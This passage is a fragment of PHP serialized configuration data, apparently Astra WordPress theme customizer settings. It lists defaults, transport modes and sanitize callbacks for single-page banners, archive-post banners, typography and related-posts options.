";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"em";s:11:"tablet-unit";s:2:"em";s:11:"mobile-unit";s:2:"em";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:48:"astra-settings[ast-dynamic-single-post-taxonomy]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:50:"astra-settings[ast-dynamic-single-post-taxonomy-1]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:50:"astra-settings[ast-dynamic-single-post-taxonomy-2]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:42:"astra-settings[single-page-content-layout]";a:4:{s:7:"default";s:15:"plain-container";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:42:"astra-settings[single-page-sidebar-layout]";a:4:{s:7:"default";s:10:"no-sidebar";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:40:"ast-dynamic-single-page-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:37:"astra-settings[ast-single-page-title]";a:4:{s:7:"default";b:1;s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:46:"astra-settings[ast-dynamic-single-page-layout]";a:4:{s:7:"default";s:8:"layout-1";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:57:"astra-settings[ast-dynamic-single-page-banner-width-type]";a:4:{s:7:"default";s:9:"fullwidth";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:59:"astra-settings[ast-dynamic-single-page-banner-custom-width]";a:4:{s:7:"default";i:1200;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:49:"astra-settings[ast-dynamic-single-page-structure]";a:4:{s:7:"default";a:2:{i:0;s:29:"ast-dynamic-single-page-image";i:1;s:29:"ast-dynamic-single-page-title";}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:62:"astra-settings[ast-dynamic-single-page-featured-as-background]";a:4:{s:7:"default";b:0;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:63:"astra-settings[ast-dynamic-single-page-banner-featured-overlay]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:60:"astra-settings[ast-dynamic-single-page-featured-help-notice]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:62:"astra-settings[ast-dynamic-single-page-taxonomy-clone-tracker]";a:4:{s:7:"default";i:1;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:48:"astra-settings[ast-dynamic-single-page-metadata]";a:4:{s:7:"default";a:3:{i:0;s:8:"comments";i:1;s:6:"author";i:2;s:4:"date";}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:54:"astra-settings[ast-dynamic-single-page-meta-date-type]";a:4:{s:7:"default";s:9:"published";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:51:"astra-settings[ast-dynamic-single-page-date-format]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:60:"astra-settings[ast-dynamic-single-page-horizontal-alignment]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:58:"astra-settings[ast-dynamic-single-page-vertical-alignment]";a:4:{s:7:"default";s:6:"center";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:53:"astra-settings[ast-dynamic-single-page-banner-height]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:52:"astra-settings[ast-dynamic-single-page-elements-gap]";a:4:{s:7:"default";i:10;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:57:"astra-settings[ast-dynamic-single-page-banner-background]";a:4:{s:7:"default";a:3:{s:7:"desktop";a:11:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";s:15:"background-type";s:0:"";s:16:"background-media";s:0:"";}s:6:"tablet";a:11:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";s:15:"background-type";s:0:"";s:16:"background-media";s:0:"";}s:6:"mobile";a:11:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";s:15:"background-type";s:0:"";s:16:"background-media";s:0:"";}}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:58:"astra-settings[ast-dynamic-single-page-banner-title-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:57:"astra-settings[ast-dynamic-single-page-banner-text-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:57:"astra-settings[ast-dynamic-single-page-banner-link-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:63:"astra-settings[ast-dynamic-single-page-banner-link-hover-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:69:"astra-settings[ast-dynamic-single-page-banner-title-typography-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:68:"astra-settings[ast-dynamic-single-page-banner-text-typography-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:56:"astra-settings[ast-dynamic-single-page-text-font-family]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";s:19:"sanitize_text_field";}s:56:"astra-settings[ast-dynamic-single-page-text-font-weight]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_font_weight";}}s:54:"astra-settings[ast-dynamic-single-page-text-font-size]";a:4:{s:7:"default";a:6:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:56:"astra-settings[ast-dynamic-single-page-text-font-extras]";a:4:{s:7:"default";a:6:{s:11:"line-height";s:0:"";s:16:"line-height-unit";s:2:"em";s:14:"letter-spacing";s:0:"";s:19:"letter-spacing-unit";s:2:"px";s:14:"text-transform";s:0:"";s:15:"text-decoration";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:57:"astra-settings[ast-dynamic-single-page-title-font-family]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";s:19:"sanitize_text_field";}s:57:"astra-settings[ast-dynamic-single-page-title-font-weight]";a:4:{s:7:"default";s:3:"600";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_font_weight";}}s:55:"astra-settings[ast-dynamic-single-page-title-font-size]";a:4:{s:7:"default";a:6:{s:7:"desktop";s:2:"32";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:57:"astra-settings[ast-dynamic-single-page-title-font-extras]";a:4:{s:7:"default";a:6:{s:11:"line-height";s:0:"";s:16:"line-height-unit";s:2:"em";s:14:"letter-spacing";s:0:"";s:19:"letter-spacing-unit";s:2:"px";s:14:"text-transform";s:0:"";s:15:"text-decoration";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:68:"astra-settings[ast-dynamic-single-page-banner-meta-typography-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:56:"astra-settings[ast-dynamic-single-page-meta-font-family]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";s:19:"sanitize_text_field";}s:56:"astra-settings[ast-dynamic-single-page-meta-font-weight]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_font_weight";}}s:54:"astra-settings[ast-dynamic-single-page-meta-font-size]";a:4:{s:7:"default";a:6:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:56:"astra-settings[ast-dynamic-single-page-meta-font-extras]";a:4:{s:7:"default";a:6:{s:11:"line-height";s:0:"";s:16:"line-height-unit";s:2:"em";s:14:"letter-spacing";s:0:"";s:19:"letter-spacing-unit";s:2:"px";s:14:"text-transform";s:0:"";s:15:"text-decoration";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:53:"astra-settings[ast-dynamic-single-page-banner-margin]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:54:"astra-settings[ast-dynamic-single-page-banner-padding]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";i:3;s:5:"right";i:3;s:6:"bottom";i:3;s:4:"left";i:3;}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"em";s:11:"tablet-unit";s:2:"em";s:11:"mobile-unit";s:2:"em";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:43:"astra-settings[archive-post-content-layout]";a:4:{s:7:"default";s:7:"default";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:43:"astra-settings[archive-post-sidebar-layout]";a:4:{s:7:"default";s:7:"default";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:41:"ast-dynamic-archive-post-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:38:"astra-settings[ast-archive-post-title]";a:4:{s:7:"default";b:1;s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:47:"astra-settings[ast-dynamic-archive-post-layout]";a:4:{s:7:"default";s:8:"layout-1";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:58:"astra-settings[ast-dynamic-archive-post-banner-width-type]";a:4:{s:7:"default";s:9:"fullwidth";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:60:"astra-settings[ast-dynamic-archive-post-banner-custom-width]";a:4:{s:7:"default";i:1200;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:50:"astra-settings[ast-dynamic-archive-post-structure]";a:4:{s:7:"default";a:2:{i:0;s:30:"ast-dynamic-archive-post-title";i:1;s:36:"ast-dynamic-archive-post-description";}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:53:"astra-settings[ast-dynamic-archive-post-custom-title]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:61:"astra-settings[ast-dynamic-archive-post-custom-title-support]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:59:"astra-settings[ast-dynamic-archive-post-custom-description]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:67:"astra-settings[ast-dynamic-archive-post-custom-description-support]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:61:"astra-settings[ast-dynamic-archive-post-horizontal-alignment]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:59:"astra-settings[ast-dynamic-archive-post-vertical-alignment]";a:4:{s:7:"default";s:6:"center";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:54:"astra-settings[ast-dynamic-archive-post-banner-height]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:53:"astra-settings[ast-dynamic-archive-post-elements-gap]";a:4:{s:7:"default";i:10;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:58:"astra-settings[ast-dynamic-archive-post-banner-image-type]";a:4:{s:7:"default";s:4:"none";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:57:"astra-settings[ast-dynamic-archive-post-banner-custom-bg]";a:4:{s:7:"default";a:3:{s:7:"desktop";a:11:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";s:15:"background-type";s:0:"";s:16:"background-media";s:0:"";}s:6:"tablet";a:11:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";s:15:"background-type";s:0:"";s:16:"background-media";s:0:"";}s:6:"mobile";a:11:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";s:15:"background-type";s:0:"";s:16:"background-media";s:0:"";}}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:59:"astra-settings[ast-dynamic-archive-post-banner-title-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:58:"astra-settings[ast-dynamic-archive-post-banner-text-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:58:"astra-settings[ast-dynamic-archive-post-banner-link-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:64:"astra-settings[ast-dynamic-archive-post-banner-link-hover-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:70:"astra-settings[ast-dynamic-archive-post-banner-title-typography-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:69:"astra-settings[ast-dynamic-archive-post-banner-text-typography-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:57:"astra-settings[ast-dynamic-archive-post-text-font-family]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";s:19:"sanitize_text_field";}s:57:"astra-settings[ast-dynamic-archive-post-text-font-weight]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_font_weight";}}s:55:"astra-settings[ast-dynamic-archive-post-text-font-size]";a:4:{s:7:"default";a:6:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:57:"astra-settings[ast-dynamic-archive-post-text-font-extras]";a:4:{s:7:"default";a:6:{s:11:"line-height";s:0:"";s:16:"line-height-unit";s:2:"em";s:14:"letter-spacing";s:0:"";s:19:"letter-spacing-unit";s:2:"px";s:14:"text-transform";s:0:"";s:15:"text-decoration";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:58:"astra-settings[ast-dynamic-archive-post-title-font-family]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";s:19:"sanitize_text_field";}s:58:"astra-settings[ast-dynamic-archive-post-title-font-weight]";a:4:{s:7:"default";s:3:"600";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_font_weight";}}s:56:"astra-settings[ast-dynamic-archive-post-title-font-size]";a:4:{s:7:"default";a:6:{s:7:"desktop";s:2:"32";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:58:"astra-settings[ast-dynamic-archive-post-title-font-extras]";a:4:{s:7:"default";a:6:{s:11:"line-height";s:0:"";s:16:"line-height-unit";s:2:"em";s:14:"letter-spacing";s:0:"";s:19:"letter-spacing-unit";s:2:"px";s:14:"text-transform";s:0:"";s:15:"text-decoration";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:54:"astra-settings[ast-dynamic-archive-post-banner-margin]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:55:"astra-settings[ast-dynamic-archive-post-banner-padding]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";i:3;s:5:"right";i:3;s:6:"bottom";i:3;s:4:"left";i:3;}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"em";s:11:"tablet-unit";s:2:"em";s:11:"mobile-unit";s:2:"em";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:55:"astra-settings[ast-dynamic-archive-post-banner-on-blog]";a:4:{s:7:"default";b:0;s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:45:"astra-settings[related-posts-section-heading]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:36:"astra-settings[enable-related-posts]";a:4:{s:7:"default";b:0;s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:35:"astra-settings[related-posts-title]";a:4:{s:7:"default";s:13:"Related Posts";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:45:"astra-settings[releted-posts-title-alignment]";a:4:{s:7:"default";s:4:"left";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:39:"astra-settings[related-posts-structure]";a:4:{s:7:"default";a:2:{i:0;s:14:"featured-image";i:1;s:10:"title-meta";}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:44:"astra-settings[related-posts-meta-structure]";a:4:{s:7:"default";a:3:{i:0;s:8:"comments";i:1;s:8:"category";i:2;s:6:"author";}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:44:"astra-settings[enable-related-posts-excerpt]";a:4:{s:7:"default";b:0;s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:43:"astra-settings[related-posts-excerpt-count]";a:4:{s:7:"default";i:25;s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:41:"astra-settings[related-posts-total-count]";a:4:{s:7:"default";i:2;s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:45:"astra-settings[related-posts-grid-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:7:"2-equal";s:6:"tablet";s:7:"2-equal";s:6:"mobile";s:4:"full";}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:41:"astra-settings[related-posts-query-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:38:"astra-settings[related-posts-based-on]";a:4:{s:7:"default";s:10:"categories";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:38:"astra-settings[related-posts-order-by]";a:4:{s:7:"default";s:4:"date";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:35:"astra-settings[related-posts-order]";a:4:{s:7:"default";s:3:"asc";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:42:"astra-settings[related-posts-colors-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:60:"astra-settings[related-posts-section-title-typography-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:52:"astra-settings[related-posts-title-typography-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:51:"astra-settings[related-posts-meta-typography-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:54:"astra-settings[related-posts-content-typography-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[related-posts-text-color]";a:4:{s:7:"default";s:25:"var(--ast-global-color-2)";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[related-posts-link-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:52:"astra-settings[related-posts-design-section-heading]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:41:"astra-settings[related-posts-title-color]";a:4:{s:7:"default";s:25:"var(--ast-global-color-2)";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:46:"astra-settings[related-posts-background-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:40:"astra-settings[related-posts-meta-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:46:"astra-settings[related-posts-link-hover-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:51:"astra-settings[related-posts-meta-link-hover-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:47:"astra-settings[related-posts-title-font-family]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";s:19:"sanitize_text_field";}s:47:"astra-settings[related-posts-title-font-weight]";a:4:{s:7:"default";s:3:"500";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_font_weight";}}s:45:"a